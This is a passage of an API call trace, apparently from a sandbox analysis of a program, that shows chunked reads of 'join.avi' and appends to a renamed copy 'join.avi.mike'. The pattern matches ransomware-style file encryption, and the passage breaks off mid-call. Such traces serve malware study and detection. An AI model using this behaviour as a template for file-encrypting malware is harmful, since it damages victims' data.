SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.870] GetFileType (hFile=0x264) returned 0x1 [0044.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.870] GetFileType (hFile=0x264) returned 0x1 [0044.870] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0044.870] WriteFile (in: hFile=0x264, lpBuffer=0x2287fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2287fe0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.870] CloseHandle (hObject=0x264) returned 1 [0044.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.872] GetFileType (hFile=0x264) returned 0x1 [0044.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.872] GetFileType (hFile=0x264) returned 0x1 [0044.872] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0044.872] ReadFile (in: hFile=0x264, lpBuffer=0x228aa18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x228aa18*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.872] CloseHandle (hObject=0x264) returned 1 [0044.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.873] GetFileType (hFile=0x264) returned 0x1 [0044.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.873] GetFileType (hFile=0x264) returned 0x1 [0044.873] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0044.873] WriteFile (in: hFile=0x264, lpBuffer=0x2294f80*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2294f80*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.873] CloseHandle (hObject=0x264) returned 1 [0044.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.874] GetFileType (hFile=0x264) returned 0x1 [0044.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.875] GetFileType (hFile=0x264) returned 0x1 [0044.875] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0044.875] ReadFile (in: hFile=0x264, lpBuffer=0x22979b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22979b8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.875] CloseHandle (hObject=0x264) returned 1 [0044.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.875] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.876] GetFileType (hFile=0x264) returned 0x1 [0044.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.876] GetFileType (hFile=0x264) returned 0x1 [0044.876] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0044.876] WriteFile (in: hFile=0x264, lpBuffer=0x22a1f20*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22a1f20*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.876] CloseHandle (hObject=0x264) returned 1 [0044.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.877] GetFileType (hFile=0x264) returned 0x1 [0044.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.877] GetFileType (hFile=0x264) returned 0x1 [0044.877] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0044.877] ReadFile (in: hFile=0x264, lpBuffer=0x22a4958, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22a4958*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.877] CloseHandle (hObject=0x264) returned 1 [0044.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.878] GetFileType (hFile=0x264) returned 0x1 [0044.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.878] GetFileType (hFile=0x264) returned 0x1 [0044.878] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0044.878] WriteFile (in: hFile=0x264, lpBuffer=0x22aeec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22aeec0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.879] CloseHandle (hObject=0x264) returned 1 [0044.880] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.880] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.880] GetFileType (hFile=0x264) returned 0x1 [0044.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.880] GetFileType (hFile=0x264) returned 0x1 [0044.880] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0044.880] ReadFile (in: hFile=0x264, lpBuffer=0x22b18f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b18f8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.880] CloseHandle (hObject=0x264) returned 1 [0044.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.881] GetFileType (hFile=0x264) returned 0x1 [0044.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.881] GetFileType (hFile=0x264) returned 0x1 [0044.881] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0044.881] WriteFile (in: hFile=0x264, lpBuffer=0x22bbe60*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22bbe60*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.882] CloseHandle (hObject=0x264) returned 1 [0044.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.883] GetFileType (hFile=0x264) returned 0x1 [0044.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.883] GetFileType (hFile=0x264) returned 0x1 [0044.883] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0044.883] ReadFile (in: hFile=0x264, lpBuffer=0x22be898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22be898*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.883] CloseHandle (hObject=0x264) returned 1 [0044.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.884] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.884] GetFileType (hFile=0x264) returned 0x1 [0044.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.884] GetFileType (hFile=0x264) returned 0x1 [0044.884] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0044.885] WriteFile (in: hFile=0x264, lpBuffer=0x22c8e00*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22c8e00*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.885] CloseHandle (hObject=0x264) returned 1 [0044.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.886] GetFileType (hFile=0x264) returned 0x1 [0044.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.886] GetFileType (hFile=0x264) returned 0x1 [0044.886] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x19000 [0044.886] ReadFile (in: hFile=0x264, lpBuffer=0x22cb838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22cb838*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.886] CloseHandle (hObject=0x264) returned 1 [0044.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.887] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.887] GetFileType (hFile=0x264) returned 0x1 [0044.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.887] GetFileType (hFile=0x264) returned 0x1 [0044.887] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x19220 [0044.887] WriteFile (in: hFile=0x264, lpBuffer=0x22d5da0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22d5da0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.888] CloseHandle (hObject=0x264) returned 1 [0044.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.889] GetFileType (hFile=0x264) returned 0x1 [0044.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.889] GetFileType (hFile=0x264) returned 0x1 [0044.889] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1b800 [0044.889] ReadFile (in: hFile=0x264, lpBuffer=0x22d87d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d87d8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.889] CloseHandle (hObject=0x264) returned 1 [0044.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.890] GetFileType (hFile=0x264) returned 0x1 [0044.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.890] GetFileType (hFile=0x264) returned 0x1 [0044.890] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1ba20 [0044.890] WriteFile (in: hFile=0x264, lpBuffer=0x22e2d40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22e2d40*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.891] CloseHandle (hObject=0x264) returned 1 [0044.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.892] GetFileType (hFile=0x264) returned 0x1 [0044.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.892] GetFileType (hFile=0x264) returned 0x1 [0044.892] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1e000 [0044.892] ReadFile (in: hFile=0x264, lpBuffer=0x22e5778, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22e5778*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.911] CloseHandle (hObject=0x264) returned 1 [0044.912] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.912] GetFileType (hFile=0x264) returned 0x1 [0044.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.913] GetFileType (hFile=0x264) returned 0x1 [0044.913] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1e220 [0044.913] WriteFile (in: hFile=0x264, lpBuffer=0x22efce0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22efce0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.913] CloseHandle (hObject=0x264) returned 1 [0044.914] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.914] GetFileType (hFile=0x264) returned 0x1 [0044.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.915] GetFileType (hFile=0x264) returned 0x1 [0044.915] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x20800 [0044.915] ReadFile (in: hFile=0x264, lpBuffer=0x22f2718, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22f2718*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.916] CloseHandle (hObject=0x264) returned 1 [0044.919] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.919] GetFileType (hFile=0x264) returned 0x1 [0044.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.919] GetFileType (hFile=0x264) returned 0x1 [0044.919] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x20a20 [0044.920] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft 